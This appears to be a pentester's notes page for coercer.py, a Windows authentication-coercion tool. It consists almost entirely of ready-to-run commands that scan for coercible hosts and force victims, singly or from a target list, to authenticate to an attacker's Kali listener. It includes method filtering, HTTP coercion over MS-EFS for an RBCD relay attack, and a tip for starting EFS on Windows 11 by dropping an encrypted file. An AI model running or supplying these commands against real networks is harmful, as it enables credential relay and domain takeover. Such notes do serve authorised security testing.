# coercer.py

Coercer coerces things to talk to other things!

# Scan a host to see if it can be leveraged to coerce authentication

coercer.py scan -u lowpriv -p 'pass123!' -t some.victim.host

# Coerce auth from a victim to a system of your choice

coercer.py coerce -u 7ms -p 'pass' -t SOME.VICTIM.IP.ADDY -l LOCAL.KALI.IP.ADDY

# Coerce using a text list of targets

coercer.py coerce -u 7ms -p 'pass' --targets-file list-of-victims.txt -l LOCAL.KALI.IP.ADDY

# Coerce using a specific method name (that you cleaned from the SCAN mode)

This example uses EpsRpcFileKeyInfo:

coercer.py coerce -u lowpriv -p 'password1' -t target.for.coercer.attack -l your.kali.ip.addy --filter-method-name EpsRpcFileKeyInfo

# Coerce Web auth from a victim to pull off the RBCD attack

coercer.py coerce --auth-type http -l your.local.kali.ip -t ip.of.victim.machine -d domain.com -u lowpriv -p 'P@ssw0rd1' --filter-protocol-name MS-EFS

(More info about this in the ntlmrelay section)

# Troubleshooting

I learned in this BloodHound Slack thread that (public) coercer shenanigans won't work on Windows 11 (at least not Win11 23H2). One user notes a way that might work to get EFS coercion to work:

EFS is not running by default on Windows 11 so that's why coercion will not work. If you can somehow drop an encrypted file on the machine, Explorer will automatically start EFS once it sees it, IIRC.